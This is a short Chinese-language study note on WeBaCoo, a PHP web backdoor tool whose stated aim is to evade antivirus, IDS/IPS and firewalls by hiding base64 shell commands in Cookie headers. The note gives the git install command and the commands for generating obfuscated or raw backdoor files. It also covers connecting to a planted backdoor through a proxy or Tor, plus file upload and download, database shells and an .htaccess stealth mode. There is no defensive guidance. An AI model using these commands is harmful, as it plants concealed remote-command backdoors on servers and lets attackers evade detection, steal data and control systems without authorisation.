PHP WeBaCoo后门学习笔记 - PHP WeBaCoo backdoor learning notes

　　WeBaCoo （Web Backdoor Cookie） 是一款隐蔽的脚本类Web后门工具。设计理念是躲避AV、NIDS、IPS、网络防火墙和应用防火墙的查杀，提供混淆和原始两种后门代码（原始代码较难检测）。WebBaCoo 使用HTTP响应头传送命令执行的结果，Shell命令经过Base64编码后隐藏在Cookie头中。

安装：

官网：http://sbechtsoudis.com/archiive/webacoo/index.html

kali linux下默认位于：/usr/bin 目录下

使用git安装：git clone git://github.com/anestisb/WeBaCoo.git

常见使用方法：

生成模式（后门生成）：

1、使用默认配置生成模糊后门代码：

webacoo -g -o backdoor.php #backdoor.php为自定义后门文件名

2、使用exec有效载荷生成混淆后门代码：

webacoo -g -o backdoor.php -f 3  #backdoor.php为自定义后门文件名 3表示exec方法

3、使用popen有效载荷生成原始后门代码：

webacoo -g -o backdoor.php -f 5 -r #backdoor为自定义后门文件名 5表示popen方法

终端模式（后门利用）：

1、使用默认配置访问服务器：

webacoo -t -u http://xxx/backdoor.php #-u 后门路径

2、使用“Cookie-name”作为Cookie名称、“TtT”作为分隔符访问服务器：

webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" #Cookie-name 与 TtT 为自定义内容

3、使用一般代理：

webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" -p XX.XX.XX.XX:XXXX #Cookie-name 与 TtT 为自定义内容 XX替换为相应的ip和端口号

4，使用tor代理：

webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" -p tor #Cookie-name 与 TtT 为自定义内容

参数解释：

-f FUNCTION ：使用PHP系统函数 system、shell_exec、exec、passthru、popen ，按顺序FUNCTION分别为数字1、2、3、4、5

-g：生成后门

-o：指定生成的后门文件名

-u URL：后门路径

-e CMD：单独命令执行模式 需要添加 -t 和 -u参数

-m METHOD：选择HTTP请求方式，默认为GET

-c COOKIE：Cookie的名字，默认为：M-cookie

-d DELIM：指定分隔符 默认为随机

-p PROXY：使用代理

-v LEVEL：打印的详细程度。默认0 无附加信息，1打印HTTP头，2打印HTTP头和数据

-h：显示帮助文件并退出

-update：更新

mysql-cli：MySQL命令行模式

psql-cli：Postgres命令行模式

upload 使用POST上传文件

download：下载文件

stealth：通过.htaccess 处理增加的隐形模块